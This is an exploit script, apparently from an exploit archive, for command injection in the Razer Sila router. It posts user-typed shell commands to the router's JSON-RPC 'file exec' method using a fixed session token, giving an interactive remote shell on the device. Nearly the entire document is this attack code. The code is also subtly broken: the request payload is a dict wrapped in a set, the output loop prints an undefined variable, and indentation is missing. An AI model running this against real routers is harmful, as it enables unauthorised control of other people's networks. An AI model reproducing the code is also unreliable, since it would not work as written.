# Exploit Title: Razer Sila - Command Injection (py)
# Google Dork: N/A
# Date: 2022-04-22
# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
# Contact: 0xProfessional@protonmail.com
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A
import requests
import sys
import json
target = sys.argv[1]
h = {
'Host': target,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '117',
'Origin': target,
'Referer': target,
'Te': 'trailers',
'Connection': 'close'
}
def usage():
print("Razer Sila - Command Injection ")
print("Coded by Mohsen Dehghani [aka 0xProfessional]")
print("Contact to me: 0xProfessional@protonmail.com")
print("Ex: python3 Exploit.py 127.0.0.1")
# Data Json
def main(url):
while(1):
try:
cmd = input("$")
dataJson = {
{"jsonrpc":"2.0","id":3,
"method":"call",
"params":["30ebdc7dd1f519beb4b2175e9dd8463e",
"file",
"exec",
{"command":cmd}]}}
if cmd == 'quit' or cmd == 'exit':
break
req = requests.post(url,headers=h,data=dataJson)
if req.status_code == 200:
for jsonData in req.content:
print(i['stdout'])
else:
print("Router Not Vulnerable :(")
break
except:
print("Error:(")
try:
if len(sys.argv) == 2:
main(sys.argv[1])
else:
usage()
except KeyboardInterrupt as e:
sys.exit()